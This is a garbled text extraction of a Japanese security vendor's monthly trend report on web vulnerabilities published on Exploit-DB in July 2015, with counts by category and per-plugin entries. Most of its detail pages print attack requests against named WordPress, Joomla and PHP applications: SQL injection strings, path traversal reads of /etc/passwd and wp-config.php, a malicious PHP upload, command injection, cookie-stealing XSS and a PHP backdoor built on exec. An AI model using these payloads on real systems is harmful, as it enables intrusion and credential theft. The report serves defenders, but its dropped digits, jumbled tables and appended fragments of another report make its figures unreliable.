サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデー

Size: px

Start display at page:

Download "サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデー"

もりよりさわまつ
5 years ago
Views:

1 05.07

2 サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 05 年 7 月に公開された Exploit-DB を分析した結果 SQL インジェクション (SQL Injection) 攻撃に対する脆弱性が最も多く報告されました SQL インジェクション攻撃は攻撃が可能かどうかを判断する単純なクエリーから直接情報を抜き出すクエリーそしてシステムに一時的な障害を起こし攻撃を試みるクエリーまで攻撃難度から見ると非常に多様であったことが分かりました SQL インジェクション攻撃はその特性上攻撃が成功になると次攻撃を仕掛けシステム上の機密情報や個人情報が漏洩される可能性があるため危険度が非常にい攻撃です主要ソフトウェア別の脆弱性発生状況を見るとを含めつのソフトウェアにて (, Arap Portal,,,, ) SQL インジェクション攻撃が発見されましたこれらのソフトウェアを使用する企業の管理者様はセキュアコーディングの適用と定期的なアップデートを行い SQL インジェクション攻撃にさらされないよう注意してください. 脆弱性別件数脆弱性カテゴリ SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting:XSS) ローカルファイル挿入 (Local File Inclusion:LFI) コマンドインジェクション (Command Injection) ディレクトリトラバーサル (Directory Traversal) ファイルアップロード (File Upload) 件数 5 合計 38 5 脆弱性別件数危険度別件数危険度件数割合危険度別分類早急対応要 9 % 8 7% 合計 37 00% 9 早急対応要 8 3. 攻撃実行の難度別件数難度件数割合難 % 中 % 8% 合計 38 00% 攻撃実行の難度別件数難中. 主なソフトウェア別脆弱性発生件数ソフトウェア名 ger Arab Portal g phpsqlitecms phpliteadmin 合計件数主なソフトウェア別脆弱性発生件数 ger Arab Portal g phpsqlitecms phpliteadmin Copyright 05 Penta Security Systems Inc. All rights reserved

3 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可 : システム情報を取得するかあるいはクライアントに次被害を及ぼす中 : 情報漏洩攻撃実行難度分類基準難 : 複数の脆弱性を突いた攻撃パターン対象のシステムの重要な情報を取得するため度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号脆弱性カテゴリ攻撃難度危険度脆弱性名ソフトウェア名 37 SQL Injection 37 SQL Injection 375 File Upload 3753 SQL Injection 3750 SQL Injection LFI 早急対応要 3703 SQL Injection 3703 XSS 中 379 LFI SQL Injection 難 SQL Injection 中 SQL Injection 中 Albo Pretorio Online 3. - /albo-folder/ SQL Albo Pretorio Online 3. - admin.php SQL ACF Frontend Display Plugin index.php File Upload 脆弱性 EasyMap Plugin. - admin-ajax.php SQL CP Multi View Event Calendar Plugin..7 - /wordpress/ SQL CP Image Store with Slideshow Plugin /wp-path/ LFI 脆弱性 CP Contact Form with Paypal Plugin..5 - admin.php SQL CP Contact Form with Paypal Plugin..5 - admin.php BuddyPress Activity Plus Plugin.5 - adminajax.php LFI 脆弱性 Count Per Day Plugin 3. - counter-options.php SQL Unite Gallery Lite Plugin.. - admin-ajax.php SQL Unite Gallery Lite Plugin.. - admin.php SQL Copyright 05 Penta Security Systems Inc. All rights reserved

4 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です 05/07/0 37 SQL Injection Albo Pretorio Online 3. - /albo-folder/ SQL /albo-folder/?action=visatto&id=%0and%0= Albo Pretorio Online 3. 05/07/0 37 SQL Injection Albo Pretorio Online 3. - admin.php SQL /wpadmin/admin.php?page=responsabili&action=edit&id =%0and%0= Albo Pretorio Online 3. 05/07/ XSS 05/07/ File Upload phpliteadmin. - phpliteadmin.php ACF Frontend Display Plugin index.php File Upload 脆弱性 /sectest/phpliteadmin_v- /phpliteadmin.php?droptable= <script>alert()</script> POST /wp-content/plugins/acf-frontenddisplay/js/blueimp-jquery-file-uploadd5deb/server/php/index.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT.; WOW; Trident/.0) Content-Type: multipart/form-data; boundary= dd009908f phpliteadmin phpliteadmin. ACF Frontend Display Plugin dd009908f Content-Disposition: form-data; name="filedata"; filename="evil.php" Content-Type: application/octet-stream <? phpinfo();?> dd009908f-- 05/07/ SQL Injection 中.5. - GetXmlTree.php SQL /centreon/include/common/xmltree/getxmltree.php? si d=%7%bif(%3c0,sleep(),%7%7)%b% /07/ ommand Injectio 中早急対応要.5. - ge tstats.php Command /centreon/include/administration/coreperformance/ge tstats.php?ns_id= +more+/etc/passwd+%3&key=a ctive_service_check&start=today&session_id=abc.5. 05/07/ SQL Injection EasyMap Plugin. - admin-ajax.php SQL POST /wp-admin/admin-ajax.php HTTP/. EasyMap Plugin. 05/07/ SQL Injection 05/07/ LFI 早急対応要 05/07/3 370 SQL Injection 難早急対応要 CP Multi View Event Calendar Plugin..7 - /wordpress/ SQL mapid=&mapname='+or+%3d%3b&action=e m_img_save_map_name /wordpress/?action=data_management&cpmvc_do_a ction=mvparse&f=edit&id=%0and%0= CP Image Store /wp-path/?action=cpis_init&cpis-action=fdownload&purchase_id=&cpis_user_ =i0secla with Slideshow Plugin /wp-path/ LFI 脆弱性 B@intermal.com&f=../../../../wp-config.php POST /process/planning.php HTTP/..3 - planning.php SQL Injection 脆弱性 CP Multi View Event Calendar Plugin..7 CP Image Store with Slideshow Plugin /07/3 370 SQL Injection 難早急対応要 05/07/3 370 SQL Injection 難早急対応要 05/07/3 370 LFI 早急対応要.3 - user_groupes.php SQL filtregroupeprojet=&projet_anything=anything') union all select,table_name,333,,555,,777,888,999 from information_schema.tables# /user_groupes.php?page=&order=,(select%0case %0when%0(=)%0then%0%0else%0*(se lect%0%0from%0information_schema.tables)en d)=&by= /groupe_list.php?page=&order=,(select%0case%.3-0when%0(=0)%0then%0%0else%0*(sele groupe_list.php SQL Injection ct%0%0from%0information_schema.tables)end) 脆弱性 =&by=.3 - feries.php LFI 脆弱性 /process/feries.php?fichier=../../../../../../../etc/passw d Copyright 05 Penta Security Systems Inc. All rights reserved

5 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です 05/07/ SQL Injection 05/07/ XSS 中 CP Contact Form /wpadmin/admin.php?page=cp_contact_form_paypal&u= with Paypal Plugin..5 - admin.php SQL Injection 脆弱 &r= &name=csrf">update 性 CP Contact Form with Paypal Plugin..5 - admin.php POST /wpadmin/admin.php?page=cp_contact_form_paypal&cal =&r= HTTP/. CP Contact Form with Paypal Plugin..5 CP Contact Form with Paypal Plugin..5 fp_message=the following contact message has been sent:<%info%></textarea><script>alert();< /script> 05/07/3 370 XSS 05/07/3 370 XSS 05/07/3 370 XSS 05/07/3 370 Directory Traversal 05/07/ XSS..8 - adminupload.php..8 - backup_restore.php..8 - admin.php..8 - adminthemes-editor.php Directory Traversal 脆弱性 /dashboard/settings/categori es/ /zenphoto-zenphoto-..8/zp-core/adminupload.php?error=%lt%3bscript%gt%3balert() %lt%3b%fscript%gt%3b /zenphoto-zenphoto-..8/zpcore/utilities/backup_restore.php?compression=%lt %3Bscript%gt%3Balert%8%9%lt%3B%Fsc ript%gt%3b /zenphoto-security-fixes/zpcore/admin.php?action=external&error=" onmouseover="alert('xsstest')" foo="bar&msg=hover over me! /zenphoto-zenphoto-..8/zp-core/admin-themeseditor.php?theme=../../../../../var/www&file=secret.p hp POST /dashboard/settings/categories/ HTTP/ name="><script>alert()</script> 05/07/ XSS /dashboard/settings/links/ POST /dashboard/settings/categories/ HTTP/ title="><script>alert()</script> 05/07/ XSS /dashboard/tools/pingservers / POST /dashboard/tools/pingservers/ HTTP/ /07/ SQL Injection 難早急対応要 Arab Portal 3 - members.php SQL url= cript> POST members.php?action=singup HTTP/. Arab Portal Arab Portal 3 show =' AND (SELECT FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady Copyright 05 Penta Security Systems Inc. All rights reserved

6 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です 05/07/ XSS 中 phpsqlitecms - index.php /ilosuna-phpsqlitecms-d9b89/ilosuna-phpsqlitecmsd9b89/cms/index.php?mode=comments&type=0& edit=9&comment_id="/><script>alert('xss by hyp3rlinx '%bdocument.cookie)</script>&page= phpsqlitec MS phpsqlitec MS 05/07/ 370 SQL Injection 難早急対応要 ajax_search.php SQL POST members.php?action=singup HTTP/. search=getaccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pas s,account_url,null,null,null,null,null from accounts -- &start=0&skey=&sorder=&sk=08bad398bdb3cd 933befc57d08753b&is_ajax=&customer=0 &category=0&rpp= /07/5 370 LFI 05/07/7 379 LFI DOCman Component /components/com_docman/dl.php?archive=0&file=.. - configuration.php LFI 脆弱性 /../../../../../../target/www/configuration.php BuddyPress Activity Plus Plugin.5 - admin-ajax.php LFI 脆弱性 POST /wp-admin/admin-ajax.php HTTP/. DOCman Component BuddyPress Activity Plus Plugin.5 data=bpfb_photos[]=../../../../wp-config.php 05/07/ 37 SQL Injection! Helpdesk Pro Plugin <..0 - index.php SQL POST /index.php?option=com_helpdeskpro&view=tickets HTTP/.! plugin Helpdesk Pro <..0 05/07/ 37 LFI 早急対応要 05/07/ Command Injection! Helpdesk Pro Plugin <..0 - / LFI 脆弱性 - login.php Command search=&category_id=0&status_id=- &limit=0&limitstart=0&option=com_helpdeskpro&t ask=&boxchecked=0&filter_order=sleep('0')&filter_ order_dir=desc /?option=com_helpdeskpro&task=ticket.download_att achment&filename=/../../../../../../../../../../../../etc/p asswd&original_filename=anyfilename.exe POST /login.php HTTP/.! plugin Helpdesk Pro <..0 id=admin' cat /etc/passwd a%0%3 &pass=admin&authtypeopti on=use_local&loginid= 05/07/ XSS - ajax_cmd.php /ajax_cmd.php?cmd=completgraphyrecording&f ilename=<img%0src%3da%0onload%3dalert()> 05/07/ LFI - read_sessionlog.php LFI 脆弱性 /opm/read_sessionlog.php?logfile=...//...//...//...// etc/passwd Copyright 05 Penta Security Systems Inc. All rights reserved

7 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です 05/07/ SQL Injection 難 05/07/ SQL Injection 中 Count Per Day Plugin 3. - counteroptions.php SQL POST /wp-admin/options-general.php?page=countper-day/counter-options.php&tab=tools HTTP/. cpd_keep_month= MONTH) AND =(select load_file(concat(char(9),char(9),(select version()),char(),char(97),char(),char( ),CHAR(97),CHAR(99),CHAR(07),CHAR(0),CHAR( ),CHAR(),CHAR(99),CHAR(),CHAR(09),CH AR(9),CHAR(0),CHAR(),CHAR(),CHAR(98), CHAR(97),CHAR()))) -- POST /wp-admin//admin-ajax.php HTTP/. Unite Gallery Lite Plugin.. - admin-ajax.php SQL Count Per Day Plugin 3. Unite Gallery Lite Plugin.. 05/07/ SQL Injection 中 05/07/ XSS data[galleryid]= AND (SELECT * FROM (SELECT(SLEEP(5)))rock) /wpadmin/admin.php?page=unitegallery&view=items&gal Unite Gallery Lite Plugin.. - admin.php SQL leryid=%0and%0(select%0*%0from%0(s ELECT(SLEEP(5)))rock) v Persistent XSS - /interface/rest/accounts/json POST /interface/rest/accounts/json HTTP/. Unite Gallery Lite Plugin.. v Persistent XSS name=<script>alert()</script> 05/07/ /07/9 377 Command Injection Command Injection 中 ger index.php Command () ger index.php Command () /ger /index.php?action=&current_dir=C:/xampp/htd ocs/ger /&cmd=c%3A\Windows\system3\cmd.exe POST /ger-0.9.8/index.php HTTP/. g ger ger ger file_data='<?php+echo+'backdoor shell by hyp3rlinx...';+exec($_get['cmd']);+?> Copyright 05 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 06.04 最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果クロスサイトスクリプティング (Cross

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報ですペンタセキュリティシステムズ株式会社 R&D センターデー